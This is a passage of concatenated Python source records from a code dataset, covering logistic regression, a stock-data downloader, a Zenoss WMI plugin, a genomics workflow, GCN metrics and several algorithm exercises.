costs\n\n\n\"\"\"\n运用逻辑回归参数(w,b)预测标签是0还是1\n\n x: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n \n 返回: 为X的样本返回一个numpy array向量,包含预测值0或1\n\"\"\"\ndef predict(w, b, X):\n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0], 1)\n\n A = sigmoid(np.dot(w.T, X) + b)\n\n for i in range(A.shape[1]):\n if A[0,i] > 0.5:\n Y_prediction[0,i] = 1\n else:\n Y_prediction[0,i] = 0\n\n assert(Y_prediction.shape == (1, m))\n return Y_prediction\n\n\n\"\"\"\n通过调用前面实现的函数,建立逻辑回归模型\n X_train: 训练集, 通过numpy array表示, 格式为(num_px * num_px * 3, m_train)\n Y_train: 训练标签, 通过numpy array表示, 格式为(1, m_train)的向量\n X_test: 测试集, 通过numpy array表示, 格式为(num_px * num_px * 3, m_test)\n Y_test: 测试标签, 通过numpy array表示, 格式为(1, m_test)的向量\n num_iterations: 超参数,表示最优化参数过程的迭代次数\n learning_rate: 超参数,表示最优化方法的学习率\n print_cost: 打印损耗, 'true'则每迭代100次打印\n \n d: 包含模信息的字典\n\"\"\"\n\ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False):\n\n w, b = initialize_with_zeros(X_train.shape[0])\n\n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)\n\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n\n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n\n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test,\n \"Y_prediction_train\" : Y_prediction_train,\n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n return d\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"venv/myFunc.py","file_name":"myFunc.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"122495194","text":"__author__ = 'kittaaron'\n# 获取当时股票结果\n\nimport tushare as ts\nimport config.logginconfig\nimport logging\nfrom sqlalchemy import *\nfrom config import dbconfig\nimport datetime\nfrom model.StockInfo import StockInfo\nfrom model.HistData import HistData\nfrom utils.holiday_util import get_pre_transact_date\nimport sys\nfrom utils.db_utils import *\n\n\ndef save_list(datas, autocommit=True):\n session.add_all(datas)\n if autocommit:\n session.commit()\n\n\ndef build_by_hist_data(hist_data, serie):\n hist_data.volume = float(serie.volume)\n hist_data.open = float(serie.open)\n hist_data.close = float(serie.close)\n hist_data.high = float(serie.high)\n hist_data.low = float(serie.low)\n hist_data.p_change = float(serie.p_change)\n hist_data.price_change = float(serie.price_change)\n hist_data.ma5 = float(serie.ma5)\n hist_data.ma10 = float(serie.ma10)\n hist_data.ma20 = float(serie.ma20)\n hist_data.v_ma5 = float(serie.v_ma5)\n hist_data.v_ma10 = float(serie.v_ma10)\n hist_data.v_ma20 = float(serie.v_ma20)\n if 'turnover' in serie:\n hist_data.turnover = float(serie.turnover)\n\n\ndef get_pre_day_data(code, data_str, candidate_datas):\n pass\n\n\ndef build_by_k_data(hist_data, serie, pre_day_data):\n '''\n :param hist_data:\n :param serie:\n :param pre_day_data: 用来计算涨跌幅<当天价减前一天收盘价>\n :return:\n '''\n hist_data.volume = float(serie.volume)\n hist_data.open = float(serie.open)\n hist_data.close = float(serie.close)\n hist_data.high = float(serie.high)\n hist_data.low = float(serie.low)\n if pre_day_data is not None:\n 
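A shape-level smoke test for the `model` pipeline above, run on tiny synthetic data rather than the course's cat dataset (assumes the functions above are in scope):

```python
import numpy as np

rng = np.random.RandomState(0)
X_train = rng.rand(4, 6)                  # 4 features, 6 training samples
Y_train = np.array([[0, 1, 0, 1, 1, 0]])
X_test = rng.rand(4, 2)                   # 2 test samples
Y_test = np.array([[1, 0]])

d = model(X_train, Y_train, X_test, Y_test,
          num_iterations=200, learning_rate=0.1)
print(d['w'].shape, d['Y_prediction_test'].shape)   # (4, 1) (1, 2)
```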
price_change = round(hist_data.close - pre_day_data.close, 2)\n hist_data.price_change = float(price_change)\n hist_data.p_change = round((price_change / pre_day_data.close) * 100, 2)\n\n\ndef dump_hist_data(start_date, end_date):\n stocks = session.query(StockInfo).all()\n # stocks = session.query(StockInfo).filter(StockInfo.code==\"600682\").all()\n\n i = 1\n for row in stocks:\n if row is None:\n continue\n # 股票代码\n code = row.code\n # code = row['code']\n # 股票名称\n name = row.name\n # name = row['name']\n logging.info(\"%s %s 开始处理 %d\", code, name, i)\n\n hist_data = session.query(HistData).filter(\n and_(HistData.code == code, HistData.date >= start_date, HistData.date <= end_date)).first()\n\n mindatedata = session.query(HistData.code, func.min(HistData.date)).filter(HistData.code == code).group_by(\n HistData.code).first()\n maxdatedata = session.query(HistData.code, func.max(HistData.date)).filter(HistData.code == code).group_by(\n HistData.code).first()\n mindate = mindatedata[1] if mindatedata is not None else '2013-01-01'\n maxdate = maxdatedata[1] if maxdatedata is not None else datetime.date.today().strftime('%Y-%m-%d')\n\n\n i += 1\n if hist_data is not None:\n if mindate < start_date < maxdate < end_date:\n start_date = (datetime.datetime.strptime(maxdate, '%Y-%m-%d') + datetime.timedelta(days=1)).strftime(\n '%Y-%m-%d')\n elif start_date < mindate < end_date < maxdate:\n end_date = (datetime.datetime.strptime(mindate, '%Y-%m-%d') + datetime.timedelta(days=-1)).strftime(\n '%Y-%m-%d')\n else:\n logging.warning(\"%s %s %s~%s时间段内已有数据存在\", code, name, start_date, end_date)\n continue\n logging.info(\"开始dump %s %s %s~%s\", code, name, start_date, end_date)\n\n df = ts.get_hist_data(code, start=start_date, end=end_date)\n stock_hist_data = []\n if df is None or df.empty is True:\n logging.info(\"%s %s get_hist_data 没有取到历史数据, 开始从get_k_data获取\", code, name)\n df = ts.get_k_data(code, start=start_date, end=end_date)\n if df is None or df.empty is True:\n continue\n pre_day_data = None\n # 因为取出来的DataFrame正好是按时间排序的,取前一天数据时可以直接用\n for index, serie in df.iterrows():\n date = serie.date\n hist_data = HistData(code=code, name=name, date=date)\n build_by_k_data(hist_data, serie, pre_day_data)\n pre_day_data = serie\n stock_hist_data.append(hist_data)\n else:\n for index, serie in df.iterrows():\n date = index\n hist_data = HistData(code=code, name=name, date=date)\n build_by_hist_data(hist_data, serie)\n\n stock_hist_data.append(hist_data)\n save_list(stock_hist_data)\n logging.info(\"%s %s %s~%s hist data save ok\", code, name, start_date, end_date)\n\n\ndef get_start_date():\n max_date_indb = session.query(func.max(HistData.date)).first()\n max_date_indb = max_date_indb[0] if max_date_indb is not None else \"2005-12-31\"\n\n return max_date_indb if max_date_indb == datetime.date.today().strftime('%Y-%m-%d') \\\n else(datetime.datetime.strptime(max_date_indb, '%Y-%m-%d') + datetime.timedelta(days=1)).strftime('%Y-%m-%d')\n\n\nif __name__ == '__main__':\n start_date = get_start_date()\n delta = datetime.timedelta(days=0)\n current_hour = datetime.datetime.now().hour\n today = datetime.date.today()\n end_date = today.strftime('%Y-%m-%d')\n if current_hour < 15:\n end_date = get_pre_transact_date(end_date)\n\n argv = len(sys.argv)\n if argv > 2:\n start_date = sys.argv[1]\n end_date = sys.argv[2]\n logging.info(\"%s %s\", start_date, end_date)\n dump_hist_data(start_date, 
end_date)\n","sub_path":"stock/task/hist_data.py","file_name":"hist_data.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"325844854","text":"##############################################################################\n# \n# Copyright (C) Zenoss, Inc. 2007-2013, all rights reserved.\n# \n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n# \n##############################################################################\n\n\nfrom Products.DataCollector.plugins.CollectorPlugin import CollectorPlugin\n\nclass WMIPlugin(CollectorPlugin):\n \"\"\"\n A WMIPlugin defines a native Python collection routine and a parsing\n method to turn the returned data structure into a datamap. A valid\n WMIPlugin must implement the process method.\n \"\"\"\n transport = \"wmi\"\n deviceProperties = CollectorPlugin.deviceProperties + (\n 'zWmiMonitorIgnore', \n 'zWinUser',\n 'zWinPassword',\n 'zWinEventlogMinSeverity',\n 'zWinEventlogClause',\n )\n \n def condition(self, device, log):\n return not getattr(device, 'zWmiMonitorIgnore', True)\n\n def copyDataToProxy(self, device, proxy):\n for prop in self.deviceProperties:\n if device.hasProperty(prop, useAcquisition=True):\n value = device.getProperty(prop)\n elif hasattr(device, prop):\n value = getattr(device, prop)\n if callable(value):\n value = value()\n else:\n continue\n setattr(proxy, prop, value)\n # Do any other prep of plugin here\n setattr(proxy, 'lastChange', getattr(device, '_lastChange', ''))\n\n def queries(self):\n raise NotImplementedError\n \n def preprocess(self, results, log):\n if isinstance(results, Exception):\n log.error(results)\n return None\n return results\n","sub_path":"ZenPacks/zenoss/WindowsMonitor/WMIPlugin.py","file_name":"WMIPlugin.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2734217","text":"import os\n\nimport pypeliner\nimport pypeliner.managed as mgd\nfrom wgs.utils import helpers\n\nfrom alignment import paired_alignment\nfrom sv_calling import call_breakpoints\nfrom variant_calling import call_variants\nfrom workflows import remixt\nfrom workflows import titan\n\n\ndef get_fastqs(inputs, samples, sample_type):\n fq1 = {}\n fq2 = {}\n\n for sample in samples:\n fastqs = inputs[sample]['fastqs'][sample_type]\n for lane in fastqs:\n fq1[(sample, lane)] = fastqs[lane]['fastq1']\n fq2[(sample, lane)] = fastqs[lane]['fastq2']\n\n return fq1, fq2\n\n\ndef wgs_workflow(args):\n pyp = pypeliner.app.Pypeline(config=args)\n workflow = pypeliner.workflow.Workflow()\n\n config = helpers.load_yaml(args['config_file'])\n inputs = helpers.load_yaml(args['input_yaml'])\n\n tumours = helpers.get_values_from_input(inputs, 'tumour')\n normals = helpers.get_values_from_input(inputs, 'normal')\n targets = helpers.get_values_from_input(inputs, 'target_list')\n samples = tumours.keys()\n\n workflow.setobj(\n obj=mgd.OutputChunks('sample_id'),\n value=samples,\n )\n\n if args['alignment']:\n tumour_fastqs_r1, tumour_fastqs_r2 = get_fastqs(inputs, samples, 'tumour')\n normal_fastqs_r1, normal_fastqs_r2 = get_fastqs(inputs, samples, 'normal')\n\n normal_alignment_template = os.path.join(\n args['out_dir'], 'alignment', '{norm_sample_id}', '{norm_lane}', 'normal'\n )\n tumour_alignment_template = os.path.join(\n args['out_dir'], 'alignment', 
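In the stock-history record above, `build_by_k_data` derives `price_change` and `p_change` from the previous close one row at a time; with a full DataFrame the same columns come out of pandas directly (sketch, assuming a `close` column as returned by `ts.get_k_data`):

```python
import pandas as pd

# Same derivation build_by_k_data performs row by row, vectorized:
df = pd.DataFrame({'close': [10.00, 10.50, 10.29]})
df['price_change'] = (df['close'] - df['close'].shift(1)).round(2)
df['p_change'] = (df['close'].pct_change() * 100).round(2)
print(df)
#    close  price_change  p_change
# 0  10.00           NaN       NaN
# 1  10.50          0.50      5.00
# 2  10.29         -0.21     -2.00
```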
'{tum_sample_id}', '{tum_lane}', 'tumour'\n )\n\n workflow.subworkflow(\n name='wgs_alignment_paired_lanes',\n func=paired_alignment,\n args=(\n config,\n mgd.OutputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n samples,\n tumour_fastqs_r1,\n tumour_fastqs_r2,\n normal_fastqs_r1,\n normal_fastqs_r2,\n normal_alignment_template,\n tumour_alignment_template,\n )\n )\n\n museq_dir = os.path.join(args['out_dir'], 'variants')\n museq_vcf = os.path.join(museq_dir, '{sample_id}', 'museq_paired_annotated.vcf.gz')\n museq_ss_vcf = os.path.join(museq_dir, '{sample_id}', 'museq_single_annotated.vcf.gz')\n strelka_snv_vcf = os.path.join(museq_dir, '{sample_id}', 'strelka_snv_annotated.vcf.gz')\n strelka_indel_vcf = os.path.join(museq_dir, '{sample_id}', 'strelka_indel_annotated.vcf.gz')\n parsed_snv_csv = os.path.join(museq_dir, '{sample_id}', 'allcalls.csv')\n museq_paired_pdf = os.path.join(museq_dir, '{sample_id}', 'paired_museqportrait.pdf')\n museq_single_pdf = os.path.join(museq_dir, '{sample_id}', 'single_museqportrait.pdf')\n workflow.subworkflow(\n name='variant_calling',\n func=call_variants,\n args=(\n samples,\n config,\n mgd.OutputFile('parsed_snv_csv', 'sample_id', template=parsed_snv_csv, axes_origin=[]),\n mgd.InputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.InputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile('museq', 'sample_id', template=museq_vcf, axes_origin=[]),\n mgd.OutputFile('museq_ss', 'sample_id', template=museq_ss_vcf, axes_origin=[]),\n mgd.OutputFile('strelka_snv', 'sample_id', template=strelka_snv_vcf, axes_origin=[]),\n mgd.OutputFile('strelka_indel', 'sample_id', template=strelka_indel_vcf, axes_origin=[]),\n mgd.OutputFile('museq_paired_pdf', 'sample_id', template=museq_paired_pdf, axes_origin=[]),\n mgd.OutputFile('museq_single_pdf', 'sample_id', template=museq_single_pdf, axes_origin=[]),\n )\n )\n\n sv_outdir = os.path.join(args['out_dir'], 'breakpoints', '{sample_id}')\n destruct_breakpoints = os.path.join(sv_outdir, 'destruct_breakpoints.csv')\n destruct_library = os.path.join(sv_outdir, 'destruct_library.csv')\n destruct_raw_breakpoints = os.path.join(sv_outdir, 'destruct_raw_breakpoints.csv')\n destruct_raw_library = os.path.join(sv_outdir, 'destruct_raw_library.csv')\n destruct_reads = os.path.join(sv_outdir, 'destruct_reads.csv')\n lumpy_vcf = os.path.join(sv_outdir, 'lumpy.vcf')\n parsed_csv = os.path.join(sv_outdir, 'filtered_consensus_calls.csv')\n workflow.subworkflow(\n name=\"call_breakpoints\",\n func=call_breakpoints,\n args=(\n samples,\n config,\n mgd.InputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.InputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile('destruct_raw_breakpoints', 'sample_id', template=destruct_raw_breakpoints, axes_origin=[]),\n mgd.OutputFile('destruct_raw_library', 'sample_id', template=destruct_raw_library, axes_origin=[]),\n mgd.OutputFile('destruct_breakpoints', 'sample_id', template=destruct_breakpoints, axes_origin=[]),\n mgd.OutputFile('destruct_library', 'sample_id', template=destruct_library, axes_origin=[]),\n mgd.OutputFile('destruct_reads', 'sample_id', template=destruct_reads, axes_origin=[]),\n mgd.OutputFile('lumpy_vcf', 'sample_id', template=lumpy_vcf, 
axes_origin=[]),\n mgd.OutputFile('parsed_csv', 'sample_id', template=parsed_csv, axes_origin=[])\n )\n )\n\n cna_outdir = os.path.join(args['out_dir'], 'copynumber', '{sample_id}')\n remixt_raw_dir = os.path.join(cna_outdir, 'remixt', 'raw_data')\n titan_raw_dir = os.path.join(cna_outdir, 'titan')\n remixt_results_filename = os.path.join(cna_outdir, 'remixt', 'results.h5')\n titan_segments_filename = os.path.join(titan_raw_dir, 'segments.h5')\n titan_markers_filename = os.path.join(titan_raw_dir, 'markers.h5')\n titan_params_filename = os.path.join(titan_raw_dir, 'params.h5')\n workflow.subworkflow(\n name='titan',\n func=titan.create_titan_workflow,\n axes=('sample_id',),\n args=(\n mgd.InputFile('tumour.bam', 'sample_id', fnames=tumours, extensions=['.bai']),\n mgd.InputFile('normal.bam', 'sample_id', fnames=normals, extensions=['.bai']),\n mgd.InputFile(\"target_list\", 'sample_id', fnames=targets, axes_origin=[]),\n mgd.Template(titan_raw_dir, 'sample_id'),\n mgd.OutputFile('titan_segments_filename', 'sample_id', axes_origin=[], template=titan_segments_filename),\n mgd.OutputFile('titan_params_filename', 'sample_id', axes_origin=[], template=titan_params_filename),\n mgd.OutputFile('titan_markers_filename', 'sample_id', axes_origin=[], template=titan_markers_filename),\n config['globals'],\n config['cna_calling'],\n config['cna_calling']['titan_intervals'],\n mgd.InputInstance('sample_id'),\n ),\n )\n workflow.subworkflow(\n name='remixt',\n func=remixt.create_remixt_workflow,\n axes=('sample_id',),\n args=(\n mgd.InputFile('tumour.bam', 'sample_id', fnames=tumours, extensions=['.bai']),\n mgd.InputFile('normal.bam', 'sample_id', fnames=normals, extensions=['.bai']),\n mgd.InputFile('destruct_breakpoints', 'sample_id', axes_origin=[], template=destruct_breakpoints),\n mgd.InputInstance('sample_id'),\n config['cna_calling']['remixt_refdata'],\n mgd.OutputFile('remixt_results_filename', 'sample_id', axes_origin=[], template=remixt_results_filename),\n mgd.Template(remixt_raw_dir, 'sample_id'),\n config['cna_calling']['min_num_reads']\n ),\n )\n\n pyp.run(workflow)\n","sub_path":"wgs/wgs_workflow.py","file_name":"wgs_workflow.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"181549732","text":"import logging\nfrom typing import Tuple, Dict, List\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as f\nfrom sklearn.metrics import accuracy_score, roc_auc_score, precision_score, recall_score, f1_score\n\nfrom model.gcn import GraphConvolutionalNetwork, DEVICE\n\n# Set up logging\nlogger = logging.getLogger(__name__)\n\n\ndef predict_prob(\n model: GraphConvolutionalNetwork,\n input: torch.Tensor,\n adjacency: torch.Tensor,\n positive_class_id: int = 1\n) -> float:\n predicted_probs = f.softmax(model(input=input, adjacency=adjacency), dim=-1).detach()\n return predicted_probs.data.cpu().numpy()[positive_class_id]\n\n\ndef calculate_metrics(\n model: GraphConvolutionalNetwork,\n data: List[Tuple[torch.Tensor, torch.Tensor, torch.Tensor]],\n positive_class_id: int = 1\n) -> Dict[str, float]:\n predicted_probs = []\n targets = []\n for input, adjacency, target in data:\n\n # Send data to device\n input = input.to(DEVICE)\n adjacency = adjacency.to(DEVICE)\n\n # Get predicted probability of positive class from model and target classes\n predicted_probs.append(\n predict_prob(\n model=model,\n input=input,\n adjacency=adjacency,\n positive_class_id=positive_class_id\n )\n )\n 
targets.append(target.item() == positive_class_id)\n\n predicted_classes = np.array(predicted_probs) > 0.5\n return {\n \"accuracy\": accuracy_score(targets, predicted_classes),\n \"auc\": roc_auc_score(targets, predicted_probs),\n \"precision\": precision_score(targets, predicted_classes),\n \"recall\": recall_score(targets, predicted_classes),\n \"f1\": f1_score(targets, predicted_classes)\n }\n\n\ndef log_metrics(metrics: Dict[str, any], metrics_to_log: List[str]) -> None:\n for metric_name in metrics_to_log:\n logger.info(f\"{metric_name}: \\t {'{0:.3f}'.format(metrics[metric_name])}\")\n","sub_path":"src/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"261051313","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nfrom Tree import treeTool\nclass Solution(object):\n def kthSmallest(self, root, k):\n \"\"\"\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n if k == 0:\n return None\n # write code here\n path = []\n\n def getKval(root, k, path):\n if root.left != None:\n getKval(root.left, k, path)\n if len(path) == k:\n return\n path.append(root.val)\n if root.right:\n getKval(root.right, k, path)\n\n getKval(root, k, path)\n\n return path[-1]\n\n\nif __name__ == \"__main__\":\n myT = treeTool.createBinaryTree([5,3,6,2,4,'#','#',1,'#'])\n a =Solution()\n print(a.kthSmallest(myT,3))\n print(\"Done!\")\n\n\n\n\n\n\n","sub_path":"Tree/Leetcode_203/Mycode.py","file_name":"Mycode.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"577587129","text":"from pyplasm import *\nfrom larlib import *\n\ndef createStructure(vertex, cells):\n\t\"\"\"\n\tcreates roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the bone structure of the roof\n\t\"\"\"\n\tstructure = MKPOL([vertex, cells, None])\n\tstructure = SKELETON(1)(structure)\n\tstructure = OFFSET([0.2, 0.2, 0.2])(structure)\n\treturn structure\n\ndef createFaces(vertex, cells):\n\t\"\"\"\n\tcreates faces of the roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the faces of the roof\n\t\"\"\"\n\tfaces = MKPOL([vertex, cells, None])\n\tfaces = OFFSET([1.0, 1.0, 1.0])(faces)\n\tfaces = COLOR(BROWN)(faces)\n\treturn faces\n\ndef ggpl_buildRoof(vertex, cells) :\n\t\"\"\"\n\tcreates roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the roof\n\t\"\"\"\n\tstructure = createStructure(vertex, cells)\n\tfaces = createFaces(vertex, cells)\n\troof = STRUCT([faces, T(3)(-0.2), structure])\n\treturn roof\n\nif __name__ == '__main__':\n\tvertex = [(0.0, 0.0, 0.0), (16.0, 0.0, 0.0), (13.0, 12.5, 6.0), (3.0, 12.5, 6.0), (16.0, 25.0, 0.0), (0.0, 25.0, 0.0)]\n\tcells = [[1, 2, 3, 4], [1, 4, 6], [2, 3, 5], [3, 4, 5, 6]]\n\tresult = ggpl_buildRoof(vertex, cells)\n\tVIEW(result)\t","sub_path":"2017-01-27/workshop_04.py","file_name":"workshop_04.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"8800077","text":"import falcon\n\nfrom meniscus.api import ApiResource\nfrom meniscus.api.callback import callback_methods\n\nTYPE_HEADER = 
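In `calculate_metrics` above, predicted probabilities are binarized at 0.5 before the class-based scores, while AUC uses the raw probabilities. A standalone sketch of that step with scikit-learn (made-up numbers):

```python
import numpy as np
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score

predicted_probs = np.array([0.9, 0.2, 0.65, 0.4])
targets = np.array([1, 0, 1, 1])

predicted_classes = predicted_probs > 0.5   # same 0.5 cut as the module
print(accuracy_score(targets, predicted_classes))   # 0.75
print(f1_score(targets, predicted_classes))         # 0.8
print(roc_auc_score(targets, predicted_probs))      # 1.0 (uses raw probs)
```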
'TYPE'\nROUTES = 'ROUTES'\n\n\nclass CallbackResource(ApiResource):\n def on_head(self, req, resp):\n #get message token, or abort if token is not in header\n type_header = req.get_header(TYPE_HEADER, required=True)\n\n if ROUTES in type_header:\n callback_methods.get_routes_from_coordinator()\n\n resp.status = falcon.HTTP_200\n","sub_path":"meniscus/api/callback/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"552543408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 16 16:50:44 2018\n\n@author: Franc\n\"\"\"\nimport numpy as np\n\nfrom steppy.base import BaseTransformer\nfrom steppy.utils import get_logger\n\nlogger = get_logger()\n\nclass ApplResample(BaseTransformer):\n \n def __init__(self, data, ratio, seed):\n self.df = data\n self.ratio = ratio\n self.seed = seed\n self.output = {'train':{},'test':None,'eval':None}\n \n def train_test_split(self):\n df_0 = self.df.query('TARGET == 0').reset_index(drop=True)\n df_1 = self.df.query('TARGET == 1').reset_index(drop=True)\n df_test = self.df.query('TARGET == 2').reset_index(drop=True)\n \n m, n = len(df_0), len(df_1)\n np.random.seed(self.seed)\n m_eval_index = np.random.permutation(m)\n np.random.seed(self.seed)\n n_eval_index = np.random.permutation(n)\n \n df_0_eval = df_0.iloc[m_eval_index[:1],:]\n df_defaultless = df_0.iloc[m_eval_index[1:],:]\n \n df_1_eval = df_1.iloc[n_eval_index[:1],:]\n df_default = df_1.iloc[n_eval_index[1:],:]\n \n df_eval = df_0_eval.append(df_1_eval).reset_index(drop=True)\n \n self.output['test'] = df_test\n self.output['eval'] = df_eval\n return {'defaultless': df_defaultless,\n 'default': df_default}\n \n def data_split(self):\n df = self.train_test_split()\n df_default, df_defaultless = df['default'], df['defaultless']\n \n n_default = len(df_default)\n n_defaultless = self.ratio*n_default\n m = len(df_defaultless)\n \n np.random.seed(self.seed)\n m_shuffle = np.random.permutation(m)\n for i in range(int(m/n_defaultless)):\n self.output['train']['sample_%d'%i] = df_defaultless.\\\n iloc[m_shuffle[int(i*n_defaultless):int((i+1)*n_defaultless)],:].\\\n append(df_default)\n return self.output\n \n \n \n \n \n ","sub_path":"# Credit/code/main_sample.py","file_name":"main_sample.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388278103","text":"#기말 2\ndef makeMatrix(m):\n import random\n a = []\n for i in range(m):\n b = []\n for j in range(m):\n if i == j:\n b.append(0)\n else:\n b.append(random.randint(0, 1))\n a.append(b)\n return a\n\ndef printMatrix(a):\n n = len(a)\n for i in range(n):\n for j in range(n):\n print(a[i][j], end=' ')\n print()\n\ndef exchangeMatrix(a):\n c1 = 0\n c2 = 0\n for i in range(len(a)):\n for j in range(len(a[i])):\n if i < j:\n if a[i][j] == a[j][i]:\n c1 += 1\n else:\n c2 += 1\n a[i][j], a[j][i] = a[j][i], a[i][j]\n return c1, c2, a\n\n\nN = int(input('N = '))\nx = makeMatrix(N)\nprintMatrix(x)\nprint()\nresult = exchangeMatrix(x)\nprint('대칭인 원소의 개수 : ', result[0])\nprint('대칭이 아닌 원소의 개수 : ', result[1])\nprint()\nprintMatrix(result[2])\n","sub_path":"84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"294728983","text":"# def lengthOfLongestSubstring(s):\n# \tfrom collections import defaultdict\n# \tlookup = 
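For the matrix-transpose exercise above, the pair counts returned by `exchangeMatrix` can be cross-checked with a comprehension (sketch; assumes `makeMatrix` and `exchangeMatrix` from that snippet are in scope):

```python
n = 4
a = makeMatrix(n)
symmetric = sum(1 for i in range(n) for j in range(i + 1, n)
                if a[i][j] == a[j][i])
asymmetric = n * (n - 1) // 2 - symmetric
c1, c2, _ = exchangeMatrix([row[:] for row in a])   # copy: it mutates a
print((symmetric, asymmetric) == (c1, c2))          # True
```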
defaultdict(int)\n#\n# \ti = 0\n# \tj = 0\n#\n# \tans = 0\n# \tcounter = 0\n# \twhile j < len(s):\n# \t\tprint('------')\n# \t\tprint('outer ', s[i:j + 1])\n# \t\tif lookup[s[j]] > 0: # 当前字符已经存在\n# \t\t\tcounter += 1 # 窗口准备缩1位 记录有多少个字符出现过1次了\n# \t\tlookup[s[j]] += 1 # 更新当前字符的occurrence\n# \t\tj += 1\n#\n# \t\twhile counter > 0: #\n# \t\t\tprint('inner ', s[i:j])\n# \t\t\tif lookup[s[i]] > 1: # 首位字符已经出现多次了\n# \t\t\t\tcounter -= 1\n#\n# \t\t\tlookup[s[i]] -= 1 # 首位字符将不再窗口范围内\n# \t\t\ti += 1\n# \t\tans = max(ans, j - i)\n# \treturn ans\n\ndef lengthOfLongestSubstring(s):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\n\ti = 0\n\tj = 0\n\n\tans = 0\n\tcounter = 0\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1])\n\t\tif lookup[s[j]] == 1: # 当前字符已经存在\n\t\t\tcounter += 1 # 窗口准备缩1位 记录有多少个字符出现过1次了\n\t\tlookup[s[j]] += 1 # 更新当前字符的occurrence\n\t\tj += 1\n\n\t\twhile counter > 0: #\n\t\t\tprint('inner ', s[i:j])\n\t\t\tif lookup[s[i]] == 2: # 找到已经出现2次了的首位字符\n\t\t\t\tcounter -= 1\n\n\t\t\tlookup[s[i]] -= 1 # 首位字符将不再窗口范围内\n\t\t\ti += 1\n\t\tans = max(ans, j - i)\n\treturn ans\n\n'''\n3. 无重复字符的最长子串 medium\n多个字符,但是各字符的个数只能为1\n\nabcabcbb\n------\nouter a\n------\nouter ab\n------\nouter abc\n------\nouter abca\ninner abca\n------\nouter bcab\ninner bcab\n------\nouter cabc\ninner cabc\n------\nouter abcb\ninner abcb\ninner bcb\n------\nouter cbb\ninner cbb\ninner bb\n3\n\n'''\n\n\ndef lengthOfLongestSubstringTwoDistinct(s):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\ti, j, counter, ans = 0, 0, 0, 0\n\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1])\n\n\t\tif lookup[s[j]] == 0: #新的字符,开始 #记录有多少个不同字符\n\t\t\tcounter += 1\n\t\tlookup[s[j]] += 1\n\t\tj += 1\n\n\t\twhile counter > 2: # counter = 3 有3个不同字符\n\t\t\tprint('inner ', s[i:j])\n\t\t\tif lookup[s[i]] == 1: #找到多余的字符,其他字符应该有多个重复的\n\t\t\t\tcounter -= 1\n\t\t\tlookup[s[i]] -= 1\n\t\t\ti += 1\n\t\tans = max(ans, j - i)\n\treturn ans\n\n\n'''\n159. 至多包含两个不同字符的最长子串 